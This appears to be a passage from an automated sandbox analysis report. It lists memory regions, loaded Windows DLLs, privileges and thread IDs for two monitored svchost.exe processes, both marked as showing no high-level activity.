|
|
|
- |
| private_0x00007ff673a96000 | 0x7ff673a96000 | 0x7ff673a97fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673a98000 | 0x7ff673a98000 | 0x7ff673a99fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673a9a000 | 0x7ff673a9a000 | 0x7ff673a9bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673a9e000 | 0x7ff673a9e000 | 0x7ff673a9ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| ssdpsrv.dll | 0x7ff8dcdb0000 | 0x7ff8dcdf0fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ff8df3b0000 | 0x7ff8df3f2fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ff8e5d70000 | 0x7ff8e5d77fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ff8e5d80000 | 0x7ff8e5d87fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ff8e5d90000 | 0x7ff8e5d99fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ff8e7280000 | 0x7ff8e7299fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ff8e72a0000 | 0x7ff8e72b5fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ff8e8040000 | 0x7ff8e804bfff | Memory Mapped File | rwx |
|
|
|
- |
| timebrokerserver.dll | 0x7ff8e8280000 | 0x7ff8e82acfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ff8e95b0000 | 0x7ff8e95eefff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ff8e9860000 | 0x7ff8e994dfff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ff8e9ae0000 | 0x7ff8e9b11fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ff8e9b20000 | 0x7ff8e9ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #69: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #69 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE0
0x
6AC
0x
910
0x
ADC
0x
944
0x
774
0x
620
0x
61C
0x
5F8
0x
418
0x
234
0x
194
0x
3D0
0x
3C4
0x
36C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000862d330000 | 0x862d330000 | 0x862d33ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x862d340000 | 0x862d340fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000862d350000 | 0x862d350000 | 0x862d363fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000862d370000 | 0x862d370000 | 0x862d3effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000862d3f0000 | 0x862d3f0000 | 0x862d3f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000862d400000 | 0x862d400000 | 0x862d400fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000862d410000 | 0x862d410000 | 0x862d411fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x862d420000 | 0x862d4ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000862d4e0000 | 0x862d4e0000 | 0x862d4e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862d4f0000 | 0x862d4f0000 | 0x862d4f0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000862d500000 | 0x862d500000 | 0x862d500fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000862d510000 | 0x862d510000 | 0x862d510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000862d520000 | 0x862d520000 | 0x862d520fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862d530000 | 0x862d530000 | 0x862d536fff | Private Memory | rw |
|
|
|
- |
| cmd.exe-eabfe48b.pf | 0x862d540000 | 0x862d541fff | Memory Mapped File | r |
|
|
|
|
| private_0x000000862d550000 | 0x862d550000 | 0x862d553fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862d5c0000 | 0x862d5c0000 | 0x862d5c0fff | Private Memory | rw |
|
|
|
- |
| mmdevapi.dll.mui | 0x862d5d0000 | 0x862d5d0fff | Memory Mapped File | r |
|
|
|
- |
| audioendpointbuilder.dll.mui | 0x862d5e0000 | 0x862d5e0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000862d5f0000 | 0x862d5f0000 | 0x862d5f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000862d600000 | 0x862d600000 | 0x862d6fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000862d700000 | 0x862d700000 | 0x862d7bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sysmain.dll.mui | 0x862d7c0000 | 0x862d7c5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000862d7e0000 | 0x862d7e0000 | 0x862d7e6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862d800000 | 0x862d800000 | 0x862d8fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000862d900000 | 0x862d900000 | 0x862da87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000862da90000 | 0x862da90000 | 0x862dc10fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000862dc20000 | 0x862dc20000 | 0x862dc9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862dca0000 | 0x862dca0000 | 0x862dce7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862dd20000 | 0x862dd20000 | 0x862de1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862df20000 | 0x862df20000 | 0x862e01ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862e0a0000 | 0x862e0a0000 | 0x862e11ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862e120000 | 0x862e120000 | 0x862e21ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x862e220000 | 0x862e556fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000862e560000 | 0x862e560000 | 0x862e65ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862e660000 | 0x862e660000 | 0x862e75ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862e760000 | 0x862e760000 | 0x862e85ffff | Private Memory | rw |
|
|
|
- |
| pfpre_871cf952.mkd | 0x862e860000 | 0x862e890fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000862e8a0000 | 0x862e8a0000 | 0x862e8a6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862e950000 | 0x862e950000 | 0x862e956fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862ea60000 | 0x862ea60000 | 0x862eb5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862ebd0000 | 0x862ebd0000 | 0x862ebd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000862ec00000 | 0x862ec00000 | 0x862ecfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000862ed00000 | 0x862ed00000 | 0x872ecfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872ed00000 | 0x872ed00000 | 0x872edfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872ee00000 | 0x872ee00000 | 0x872eefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872ef00000 | 0x872ef00000 | 0x872effffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f000000 | 0x872f000000 | 0x872f3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f400000 | 0x872f400000 | 0x872f503fff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f510000 | 0x872f510000 | 0x872f60ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f700000 | 0x872f700000 | 0x872f7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f800000 | 0x872f800000 | 0x872f8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872f9b0000 | 0x872f9b0000 | 0x872faaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872fd00000 | 0x872fd00000 | 0x872fdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000872fe00000 | 0x872fe00000 | 0x872fefffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730000000 | 0x8730000000 | 0x87300fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730100000 | 0x8730100000 | 0x87301fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730200000 | 0x8730200000 | 0x87302fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730300000 | 0x8730300000 | 0x87303fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730400000 | 0x8730400000 | 0x87304fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730500000 | 0x8730500000 | 0x87305fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730600000 | 0x8730600000 | 0x87306fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730700000 | 0x8730700000 | 0x87307fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730800000 | 0x8730800000 | 0x87308fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730a50000 | 0x8730a50000 | 0x8730b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730d00000 | 0x8730d00000 | 0x8730dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730e00000 | 0x8730e00000 | 0x8730efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008730f00000 | 0x8730f00000 | 0x8730ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731000000 | 0x8731000000 | 0x87310fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731100000 | 0x8731100000 | 0x87311fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731200000 | 0x8731200000 | 0x87312fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731300000 | 0x8731300000 | 0x87313fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731400000 | 0x8731400000 | 0x87314fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731500000 | 0x8731500000 | 0x87315fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731600000 | 0x8731600000 | 0x87316fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008731700000 | 0x8731700000 | 0x87318c7fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffac0000 | 0x7df5ffac0000 | 0x7ff5ffabffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6737d6000 | 0x7ff6737d6000 | 0x7ff6737d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737d8000 | 0x7ff6737d8000 | 0x7ff6737d9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737da000 | 0x7ff6737da000 | 0x7ff6737dbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737dc000 | 0x7ff6737dc000 | 0x7ff6737ddfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737e0000 | 0x7ff6737e0000 | 0x7ff6737e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737e2000 | 0x7ff6737e2000 | 0x7ff6737e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737e4000 | 0x7ff6737e4000 | 0x7ff6737e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737e8000 | 0x7ff6737e8000 | 0x7ff6737e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ea000 | 0x7ff6737ea000 | 0x7ff6737ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ec000 | 0x7ff6737ec000 | 0x7ff6737edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6737ee000 | 0x7ff6737ee000 | 0x7ff6737effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6737f0000 | 0x7ff6737f0000 | 0x7ff6738effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6738f0000 | 0x7ff6738f0000 | 0x7ff673912fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff673914000 | 0x7ff673914000 | 0x7ff673914fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673918000 | 0x7ff673918000 | 0x7ff673919fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67391a000 | 0x7ff67391a000 | 0x7ff67391bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67391c000 | 0x7ff67391c000 | 0x7ff67391dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67391e000 | 0x7ff67391e000 | 0x7ff67391ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| wer.dll | 0x7ff8d73d0000 | 0x7ff8d746dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncbservice.dll | 0x7ff8dcaa0000 | 0x7ff8dcaf7fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ff8df3b0000 | 0x7ff8df3f2fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ff8e0f70000 | 0x7ff8e0f7dfff | Memory Mapped File | rwx |
|
|
|
- |
| trkwks.dll | 0x7ff8e2370000 | 0x7ff8e2391fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.dll | 0x7ff8e23a0000 | 0x7ff8e24b2fff | Memory Mapped File | rwx |
|
|
|
- |
| pcasvc.dll | 0x7ff8e2550000 | 0x7ff8e25cffff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ff8e2760000 | 0x7ff8e279efff | Memory Mapped File | rwx |
|
|
|
- |
| pcadm.dll | 0x7ff8e3160000 | 0x7ff8e316ffff | Memory Mapped File | rwx |
|
|
|
- |
| pcacli.dll | 0x7ff8e5310000 | 0x7ff8e531efff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerclient.dll | 0x7ff8e5420000 | 0x7ff8e542afff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ff8e5520000 | 0x7ff8e553cfff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ff8e6180000 | 0x7ff8e6188fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfplatform.dll | 0x7ff8e6ed0000 | 0x7ff8e6f02fff | Memory Mapped File | rwx |
|
|
|
- |
| wudfsvc.dll | 0x7ff8e6f10000 | 0x7ff8e6f2afff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| audioendpointbuilder.dll | 0x7ff8e7bc0000 | 0x7ff8e7c09fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x7ff8e7f80000 | 0x7ff8e803ffff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ff8e8040000 | 0x7ff8e804bfff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceconnectapi.dll | 0x7ff8e8120000 | 0x7ff8e8136fff | Memory Mapped File | rwx |
|
|
|
- |
| portabledeviceapi.dll | 0x7ff8e8140000 | 0x7ff8e81e0fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ff8e9500000 | 0x7ff8e9577fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ff8e95b0000 | 0x7ff8e95eefff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ff8e9fe0000 | 0x7ff8e9ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ff8eae50000 | 0x7ff8eaea3fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7ff8ebbf0000 | 0x7ff8ebdb4fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 27 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #70: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #70 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3a0 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
534
0x
790
0x
770
0x
710
0x
6F4
0x
6EC
0x
6D4
0x
6A4
0x
6A0
0x
69C
0x
698
0x
690
0x
670
0x
5B8
0x
560
0x
54C
0x
454
0x
1A4
0x
150
0x
154
0x
120
0x
3FC
0x
3F8
0x
3F4
0x
3A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000086e6be0000 | 0x86e6be0000 | 0x86e6beffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x86e6bf0000 | 0x86e6bf0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000086e6c00000 | 0x86e6c00000 | 0x86e6c13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000086e6c20000 | 0x86e6c20000 | 0x86e6c9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000086e6ca0000 | 0x86e6ca0000 | 0x86e6ca3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000086e6cb0000 | 0x86e6cb0000 | 0x86e6cb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000086e6cc0000 | 0x86e6cc0000 | 0x86e6cc1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x86e6cd0000 | 0x86e6d8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000086e6d90000 | 0x86e6d90000 | 0x86e6d90fff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e6da0000 | 0x86e6da0000 | 0x86e6da0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000086e6db0000 | 0x86e6db0000 | 0x86e6db0fff | Pagefile Backed Memory | r |
|
|
|
- |
| es.dll | 0x86e6dc0000 | 0x86e6dd1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000086e6de0000 | 0x86e6de0000 | 0x86e6de6fff | Private Memory | rw |
|
|
|
- |
| stdole2.tlb | 0x86e6df0000 | 0x86e6df4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000086e6e00000 | 0x86e6e00000 | 0x86e6efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000086e6f80000 | 0x86e6f80000 | 0x86e703ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000086e7040000 | 0x86e7040000 | 0x86e7041fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000086e7050000 | 0x86e7050000 | 0x86e7056fff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7060000 | 0x86e7060000 | 0x86e70dffff | Private Memory | rw |
|
|
|
- |
| netprofmsvc.dll.mui | 0x86e70e0000 | 0x86e70e1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000086e70f0000 | 0x86e70f0000 | 0x86e70f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000086e7100000 | 0x86e7100000 | 0x86e71fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000086e7200000 | 0x86e7200000 | 0x86e7387fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000086e7390000 | 0x86e7390000 | 0x86e7510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000086e7520000 | 0x86e7520000 | 0x86e761ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x86e7620000 | 0x86e7956fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000086e7960000 | 0x86e7960000 | 0x86e7a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7a60000 | 0x86e7a60000 | 0x86e7b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7b60000 | 0x86e7b60000 | 0x86e7c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7c60000 | 0x86e7c60000 | 0x86e7d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7d60000 | 0x86e7d60000 | 0x86e7e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7e60000 | 0x86e7e60000 | 0x86e7f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e7f60000 | 0x86e7f60000 | 0x86e805ffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-fontface.dat | 0x86e8060000 | 0x86e905ffff | Memory Mapped File | rw |
|
|
|
- |
| ~fontcache-system.dat | 0x86e9060000 | 0x86e90d5fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000086e90e0000 | 0x86e90e0000 | 0x86e91dffff | Private Memory | rw |
|
|
|
- |
